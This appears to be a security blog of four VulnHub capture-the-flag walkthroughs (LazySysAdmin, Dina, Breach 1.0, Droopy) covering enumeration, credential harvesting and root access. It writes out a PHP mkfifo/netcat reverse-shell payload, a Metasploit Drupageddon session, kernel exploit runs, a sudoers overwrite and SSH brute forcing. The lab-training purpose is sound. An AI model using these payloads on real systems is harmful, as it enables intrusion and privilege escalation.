VULNHUB – LAZYSYSADMIN WALKTHROUGH

Foreword

After I have successfully failed my first OSCP exam, I’m still in progress to practice and learn from these machines.

Enumeration

Let’s start enumeration. First of all check the website with nikto,nmap and of course browse the site manually and check if we could get some hint.

NMAP

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 172.16.132.131
|_  error: Closing link: (nmap@172.16.132.131) [Client exited]
- Nikto v2.1.6/2.1.5
+ Target Host: 172.16.132.134
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0x8ce8 0x5560ea23d23c0 
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: GET /old/: Directory indexing found.
+ GET Entry '/old/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: GET /test/: Directory indexing found.
+ GET Entry '/test/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: GET /Backnode_files/: Directory indexing found.
+ GET Entry '/Backnode_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET "robots.txt" contains 4 entries which should be manually viewed.
+ OPTIONS Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3268: GET /apache/: Directory indexing found.
+ OSVDB-3092: GET /apache/: This might be interesting...
+ OSVDB-3092: GET /old/: This might be interesting...
+ GET Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
+ GET Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3092: GET /test/: This might be interesting...
+ GET /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: GET /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ GET /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: GET /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ GET Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ GET /wordpress/: A WordPress installation was found.
+ GET /phpmyadmin/: phpMyAdmin directory found

phpMyAdmin and WordPress are also present. Tried a few login combinations with popular username/password pairs but no luck. On the WordPress website I found two interesting posts from Admin:

“My name is Togie“.

This could be a username, so note this.

I like yogibear Do you like yogibear?

Is it a password??

Tried to login as togie with the yogiebear password on the wp-admin site but still no luck…. Enumerate further.

Samba share

Found a share$ folder which – of course – is password protected. Try out our previously found words; yes, the togie/yogibear pair opened a new door.

It looks like the share contains the whole wordpress site and some hints.

Deets.txt

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345 

Todolist.txt

Prevent users from being able to view to web root using the local file browser

Our admin was super lazy, because we can reach the web root. I can bet that the 12345 password will be useful later.

Harvesting credentials – wp-config.php

Found the login credentials in the wp-config.php file, so we can login as admin.

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

Reverse shell from WordPress admin panel

I was as lazy as our admin. So on the admin panel go to Appearance/Editor and replace footer.php code with a reverse php shell code. Create the listener on our Kali machine at port 4443.

Update the settings, reload the site and enjoy the reverse shell.

root@kali:~# netcat -lvvp 4443
listening on [any] 4443 ...
172.16.132.134: inverse host lookup failed: Unknown host
connect to [172.16.132.131] from (UNKNOWN) [172.16.132.134] 57730
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
 20:37:32 up 32 min,  0 users,  load average: 0.07, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1178): Inappropriate ioctl for device
bash: no job control in this shell
www-data@LazySysAdmin:/$ 

At this point I have to note that the Inspire IRC at port 6667 possibly has a buffer overflow vulnerability, but at this time I choose a simpler method and not going in that way. If I will have time for that, a later post will cover this way.

Buffer Overflow in Inspire IRCd → port 6667

	
  • https://www.cvedetails.com/cve/CVE-2012-1836/
  • Privilege Escalation

    I have run linenum.py script which is quite popular in privesc methods. At this point I was totally stucked. I forgot to apply the KISS principle (Keep-It-Super-Simple). MySQL has UDF vulnerability, but not on this machine.

    Togie user is part of the sudo,adm etc. group so I have to find a way to login with that user. No vulnerable service, no misconfigured executable, no usable word-writable files/directories (or I still have to learn a lot….)

    After some time I remembered something….

    So when I cooled down and tried possibly everything, I reread my previous notes. What if Togie using the password mentioned in the Deets.txt file? Let’s try out this; the next few lines will speak to itself…

    www-data@LazySysAdmin:/$ python -c 'import pty;pty.spawn("/bin/bash")'
    python -c 'import pty;pty.spawn("/bin/bash")'
    www-data@LazySysAdmin:/$ su - togie
    su - togie
    Password: 12345
    
    togie@LazySysAdmin:~$ sudo -l
    sudo -l
    [sudo] password for togie: 12345
    
    Matching Defaults entries for togie on LazySysAdmin:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    
    User togie may run the following commands on LazySysAdmin:
        (ALL : ALL) ALL
    togie@LazySysAdmin:~$ su -
    su -
    Password: 12345
    
    su: Authentication failure
    togie@LazySysAdmin:~$ sudo su -
    sudo su -
    root@LazySysAdmin:~# 
    root@LazySysAdmin:~# cat /root/proof.txt
    cat /root/proof.txt
    WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
    
    
    Well done :)
    
    Hope you learn't a few things along the way.
    
    Regards,
    
    Togie Mcdogie
    
    
    
    
    Enjoy some random strings
    
    WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
    2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
    pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
    bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
    root@LazySysAdmin:~# 
    

    The other method which I forgot to use earlier, the ssh bruteforce method. Using metasploit’s burnett_top_500.txt wordlist with hydra also a good option.

    [ATTEMPT] target 172.16.132.134 - login "togie" - pass "password" - 1 of 0 [child 500] (0/0)
    [ATTEMPT] target 172.16.132.134 - login "togie" - pass "123456" - 2 of 0 [child 500] (0/1)
    [ATTEMPT] target 172.16.132.134 - login "togie" - pass "12345678" - 3 of 0 [child 500] (0/2)
    [ATTEMPT] target 172.16.132.134 - login "togie" - pass "1234" - 4 of 0 [child 500] (0/3)
    [ATTEMPT] target 172.16.132.134 - login "togie" - pass "qwerty" - 5 of 0 [child 500] (0/4)
    [ATTEMPT] target 172.16.132.134 - login "togie" - pass "12345" - 6 of 0 [child 500] (0/5)
    [ATTEMPT] target 172.16.132.134 - login "togie" - pass "dragon" - 7 of 0 [child 500] (0/6)
    [ATTEMPT] target 172.16.132.134 - login "togie" - pass "pussy" - 8 of 0 [child 500] (0/7)
    [22][ssh] host: 172.16.132.134   login: togie   password: 12345
    [STATUS] attack finished for 172.16.132.134 (valid pair found)
    1 of 1 target successfully completed, 1 valid password found
    Hydra (http://www.thc.org/thc-hydra) finished at 2018-05-01 13:04:16
    
    

    Acknowledgement

    Thank you for this machine, I learned a lot and still have to learn.

    Enumerate,enumerate,enumerate…. Enumeration is the key.

    If you are still on progress with OSCP training/exam the best advice you get is the quote mentioned above. At the end you will understand what does it mean.

    Advertisements

    Dina 1.0 Walkthrough – Vulnhub

    Another great vulnhub virtual machine for beginners – especially for me :). It was fun to test this machine –  so thank you Touhid!

    Information Gathering

    I used nmap and nikto to gather some information.

    Nikto results:

    + Target IP: 192.168.1.132
    + Target Hostname: dina.lan
    + Target Port: 80
    + Using Encoding: Random URI encoding (non-UTF8)
    + Start Time: 2017-10-18 18:39:12 (GMT2)
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.22 (Ubuntu)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 15:46:52 2017
    + Uncommon header 'tcn' found, with contents: list
    + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
    + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    + OSVDB-3268: /secure/: Directory indexing found.
    + OSVDB-3268: /secure/: Directory indexing found.
    + OSVDB-3268: /tmp/: Directory indexing found.
    + OSVDB-3092: /tmp/: This might be interesting...
    + 7444 requests: 0 error(s) and 11 item(s) reported on remote host
    + End Time: 2017-10-18 18:39:39 (GMT2) (27 seconds)

    Nmap result:

    PORT STATE SERVICE VERSION
    80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
    | http-methods:
    |_ Supported Methods: GET HEAD POST OPTIONS
    | http-robots.txt: 5 disallowed entries
    |_/ange1 /angel1 /nothing /tmp /uploads
    |_http-server-header: Apache/2.2.22 (Ubuntu)
    |_http-title: Dina

    I have checked all paths above and found some interesting strings on /nothing. Found the following strings in the comment of the source code:

    #my secret pass
    freedom
    password
    helloworld!
    diana
    iloveroot

    It looks like we found some passwords. Nice. Let’s check the other path: /secure. It contains a passwords protected backup.zip file. So I tried the passwords above and successfully unpacked it with the password freedom.

    I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
    uname: touhid
    password: ******
    url : /SecreTSMSgatwayLogin

    Ok check that secret SMS Gateway. Tried to login with the username touhid and with the passwords found earlier. The login pair was touhid:diana.

    The first thing what I usually do when identify a web application is check exploit-db for available exploits.

    PlaySMS 1.4 - 'import.php' Remote Code Execution | php/webapps/42044.txt
    PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload | php/webapps/42003.txt
    PlaySMS 1.4 - Remote Code Execution | php/webapps/42038.txt
    PlaySms 0.7 - SQL Injection | linux/remote/404.pl
    PlaySms 0.8 - 'index.php' Cross-Site Scripting | php/webapps/26871.txt
    PlaySms 0.9.3 - Multiple Local/Remote File Inclusions | php/webapps/7687.txt
    PlaySms 0.9.5.2 - Remote File Inclusion | php/webapps/17792.txt
    PlaySms 0.9.9.2 - Cross-Site Request Forgery | php/webapps/30177.txt

    This is all what I need. Touhid did a great job on finding the vulnerabilities in this application. At least 3 different kind of ways to run system commands through php system() function.

    All right it’s time to get a remote shell.

    Gaining remote shell

    I tried to run system commands as described in 42044.txt. I was trying a lot, simply nc host port -e /bin/bash didn’t worked because this netcat was an openbsd version and “-e” option is missing from the openbsd version. A few minutes research and I had created a csv file with the following content:

    Name,Email,Department
    <?php $cmd='rm -f /tmp/f; mkfifo /tmp/f && cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.109 7777 > /tmp/f 2>&1';system($cmd); ?>,2,3

    Luckily I got shell!!!

    Privilege escalation

    Running whoami told me that my current user is www-data. Okay, check the system. Running netstat -tlpn, a mysql server is running on this machine. In the SecreTSMSgatwayLogin directory was a config.php file. I checked this file and found the login and password pair for the database.

    root:hello@mysql

    Then selected the playsms database and found the user table, and the password hashes:

    mysql hashes:

    | admin_78f3198ce97ae2bdddb15cc25d559c6f |
    | touhid_3a23bb515e06d0e944ff916e79a7775c

    The findmyhash command didn’t find the password in the public database. I was too lazy to fire up oclhashcat and brute-force the hash, so moved on.

    I cannot get higher privileges through mysql system command so I wanted another way to get root access.

    cat /etc/*-release:

    DISTRIB_ID=Ubuntu
    DISTRIB_RELEASE=12.04
    DISTRIB_CODENAME=precise
    DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"

    Okay let’s invite our dirty friend….

    DirtyCow

    I am too lazy….Really… At this point I knew what to use…. I’ve got a little experience from earlier vulnhub machines and used the following exploit from exploit-db to enumerate privileges:40839.c
    I was lucky, gcc was present on that machine and the exploit compiled without errors.

    ./exploit 1234

    After a few minutes the root user firefart was created with the password 1234. Okay, check the root directory for the flag.

    firefart@Dina:/# cat /root/flag.txt
    cat /root/flag.txt
    ________ _________
    \________\--------___ ___ ____----------/_________/
    \_______\----\\\\\\ //_ _ \\ //////-------/________/
    \______\----\\|| (( ~|~ ))) ||//------/________/
    \_____\---\\ ((\ = / ))) //----/_____/
    \____\--\_))) \ _)))---/____/
    \__/ ((( (((_/
    | -))) - ))

    root password is : hello@3210
    easy one …..but hard to guess…..
    but i think u dont need root password……
    u already have root shelll….

    CONGO………
    FLAG : 22d06624cd604a0626eb5a2992a6f2e6

    Thank you Touhid M.Shaikh for the fun. It was a pleasure to play with this machine.

    Vulnhub – Breach 1.0 walkthrough

    First let’s see what we got. I did a basic nmap scan:

    nmap

    It seems that an active IPS/IDS is present. I tried different nmap evasion techniques but those didn’t work, it said that all ports are filtered. I checked manually if port 80 is open or not than  I fired up Nikto, nothing interesting.

    Capture

    Let’s watch those images. Voila, a little hint:

    hint1.PNG

    Okay, check that source code. Found an interesting line:

    <!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

    It looks like a hash or encoded string. I don’t know why, my first thought was that it is a base64 encoded string. I had to decode the string twice, and that gave me a username:password pair.

    source_base64

    Did some investigation and found a CMS portal called IMPRESSCMS (clicked on Employee portal on initech.html). Let’s see if we can log in with our username/password pair. Login successful, nice. We have 3 messages in Inbox. Lets see the first:

    keyfile

    I downloaded the keyfile located at the root of the website, and found out that this is a java keystore file. Read the 2 other messages but those didn’t help me too much. My first thought was proved itself, an active IDS/IPS is present. I searched for exploits related to impresscms but the one that could work were being trolled:

    troll.gif

    At this point I got stucked a bit. Tried dirbuster, different exploits, XSS vulnerabilities on CMS site but nothing. Tried to brute force the admin account, but no luck. Investigated the other pictures and sites deeper, nothing interesting. One option left on CMS site, check pgibbons profile. I found something interesting:

    Published by Peter Gibbons on 2016/6/4 21:37:05. (0 reads)
    Team – I have uploaded a pcap file of our red team’s re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to ‘tomcat’. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I’m going fishing for the next 2 days and will not have access to email or phone.

    Opened the pcap file, it contained data but I didn’t have a private rsa key to decrypt. WAIT! I have one! I had to export the RSA private key from .keyfile and then I was able to look what the heck happened:

    pcapcreds

    Tomcat Manager running at port 8443 (https://192.168.110.140:8443/_M@nag3Me/html/ | login successful with wireshark credentials). What more the wireshark capture gave us a hint that we can run shell commands with the help of cmd.jsp. But where it is? It has been uploaded but the resource cannot be found,  the author or a system service may deleted it. A little  googling helped me at this part. I can upload any kind of war files and there is a cmd.war file on the internet (Laudanum) that seems to be the same. So I uploaded it, searched for netcat and made a reverse shell back to my kali box.

    cmd_warcommands_with_jsp

    netcat

    First I tried to exploit some Ubuntu 14.04 based kernel exploits but all of them failed. Finally gave up probing exploits, instead I sent LinEnum priv checker to the victim machine and did a quick investigation what permissions do I have.

    MySQL login was successful without password with username root. Nice. I found Milton’s username and password hash in the database then tried to crack the password with oclHashcat. It was successfully recovered, I tried to change my user from tomcat to milton. It was successful. Another username and password was found but I can’t crack this hash within a reasonable time.

    mysql.PNG

    After that changing user from tomcat to milton find a “some_script.sh” file with following content: Nothing here.

    Okay dig deeper. Really. Nothing in here…. After some time I found an init script in init.d folder(portly.sh). This little script redirect all traffic to portly scanner. Okay I will use this script to add milton into sudoers group at system startup.

    echo “echo “milton ALL=(ALL) ALL” > /etc/sudoers” > /etc/init.d/portly.sh

    After system reboot I rebuild my connections, did a quick sudo su with milton and voila, I captured the flag.

    breach.PNG

    Vulnhub – Droopy: v0.2

    Introducion

    This is a quick post about how to hack this vulnerable virtual machine found in Vulnhub website. Just to be clear I am not a security professional, I am just learning and preparing myself to OCSP exam. If you found any mistake please let me know.

    Walkthrough

    First we do some network discovery with netdiscover:

    netdisc

    We see that host is at 192.168.1.159. Let’s do nmap scan:

    nmap -sS -A -O -vv 192.168.1.159 -Pn > nmap.txt

    PORT STATE SERVICE REASON VERSION
    80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
    |_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
    |_http-generator: Drupal 7 (http://drupal.org)
    | http-methods:
    |_ Supported Methods: GET HEAD POST OPTIONS
    | http-robots.txt: 36 disallowed entries
    | /includes/ /misc/ /modules/ /profiles/ /scripts/
    | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
    | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
    | /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
    | /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
    | /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
    | /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
    |_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
    MAC Address: 00:0C:29:4A:B9:32 (VMware)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 – 4.0

    NMAP shows in this machine there is a website hosted by Apache webserver and Drupal is running on it. I’ve investigated the site and it requires login and password. Fire up Metasploit Framework and let’s do a quick check, find an exploit suitable to our victim. Because Drupal uses MySQL database its quite trivial that a SQL injection could work.

    drupal_search

    I choosed the third one and fingers crossed. Boom, we have a meterpreter connection.

    msf > use exploit/multi/http/drupal_drupageddon
    msf exploit(drupal_drupageddon) > options

    Module options (exploit/multi/http/drupal_drupageddon):

    Name Current Setting Required Description
    —- ————— ——– ———–
    Proxies no A proxy chain of format type:host:port[,type:host:port][…]
    RHOST 192.168.1.159 yes The target address
    RPORT 80 yes The target port
    TARGETURI / yes The target URI of the Drupal installation
    VHOST no HTTP server virtual host
    Payload options (php/meterpreter/reverse_tcp):

    Name Current Setting Required Description
    —- ————— ——– ———–
    LHOST 192.168.1.200 yes The listen address
    LPORT 4444 yes The listen port
    Exploit target:

    Id Name
    — —-
    0 Drupal 7.0 – 7.31
    msf exploit(drupal_drupageddon) > exploit

    [*] Started reverse TCP handler on 192.168.1.200:4444
    [*] 192.168.1.159:80 – Testing page
    [*] 192.168.1.159:80 – Creating new user SsozXsiTZb:UldknxsZnY
    [*] 192.168.1.159:80 – Logging in as SsozXsiTZb:UldknxsZnY
    [*] 192.168.1.159:80 – Trying to parse enabled modules
    [*] 192.168.1.159:80 – Enabling the PHP filter module
    [*] 192.168.1.159:80 – Setting permissions for PHP filter module
    [*] 192.168.1.159:80 – Getting tokens from create new article page
    [*] 192.168.1.159:80 – Calling preview page. Exploit should trigger…
    [*] Sending stage (33068 bytes) to 192.168.1.159
    [*] Meterpreter session 9 opened (192.168.1.200:4444 -> 192.168.1.159:35380) at 2016-04-19 11:06:36 +0200

    meterpreter >

    Nice news, let’s lurk around and get informations out of the system. I used sysinfo command and let’s see what is it.

    meterpreter > sysinfo
    Computer : droopy
    OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
    Meterpreter : php/php
    meterpreter >

    So this is an Ubuntu machine with an old kernel. I am trying my luck and check  if this machine is vulnerable to overlayfs vulnerability or not, what user persmissions I have, am I able to compile my exploit with gcc and run it.

    First transfer the exploit to /tmp folder with meterpreter’s upload command and try to execute it:

    meterpreter > getuid
    Server username: www-data (33)
    meterpreter > upload /root/Downloads/37292.c /tmp
    [*] uploading : /root/Downloads/37292.c -> /tmp
    [*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
    meterpreter > shell
    Process 1256 created.
    Channel 1 created.
    cd /tmp
    gcc 37292.c -o exploit
    chmod +x exploit
    ./exploit
    spawning threads
    mount #1
    mount #2
    child threads done
    /etc/ld.so.preload created
    creating shared library
    sh: 0: can’t access tty; job control turned off
    # whoami
    root
    #

    Nice, we have root access to the system, let’s find the flag. Usually flag takes place in the root directory, so let’s see what we have.

    dave.tc

    Dave.tc? Wut? After googling a bit I found that .tc extension could be a TrueCrypt password protected file. Google says that TrueCrypt are discontinued and password protected volumes can be hacked with proper program and with a good dictionary. My first thought was OclHashcat because I have an AMD card, and truecracker in Kali Linux supports Nvidia card (only?). I didn’t do research if it supports AMD too, because I am happy with OclHashcat. When I downloaded this vulnerable machine I saw two hints:

    1.) Grab a copy of the rockyou wordlist.

    2.) It’s fun to read other people’s email.

    Okay, I have rockyou wordlist so check /var/mail:

    mail

    Okay, let’s rock:

    oclHashcat64.exe -a 0 -m 6211 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”

    Exhausted. Nothing. At this point several hours later still nothing. I tried to apply rules (best64), different dictionaries, nothing. The last sentence also could give a hint, I did a dictionary combinaton attack ( downloaded lyrics from The Jam, did a dictionary from this and combinated with rockyou). Still no luck. Will I fail at this point? This was so easy until this point. TRY HARDER! So I did a break and when I sit front of my computer again I had clue. What if I am trying with wrong hashing algorithm? Some guys on hashcat forums mentioned that should try SHA512 algorithm instead of RipeMD160. Okay, fire up OclHashcat again.

    oclHashcat64.exe -a 0 -m 6221 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”

    After a couple of minutes it finished. Cracked. Okay, lets install TrueCrypt and check what we got. When it prompt for password I tried Copy/Paste and….. Wrong password. OMG what happening? Again CTRL+C CTRL+V, still no luck. Could it be possible? What if I type the password instead of copy/paste? Yes, it was my fault. It shows the drive, mounted to drive H:

    drive

    Check out this drive. Nothing interesting, some jpg files and a .secret folder. HMMM!

    I opened this one and under the .top folder I captured the flag.

    flag

    This was quite fun! Thank you!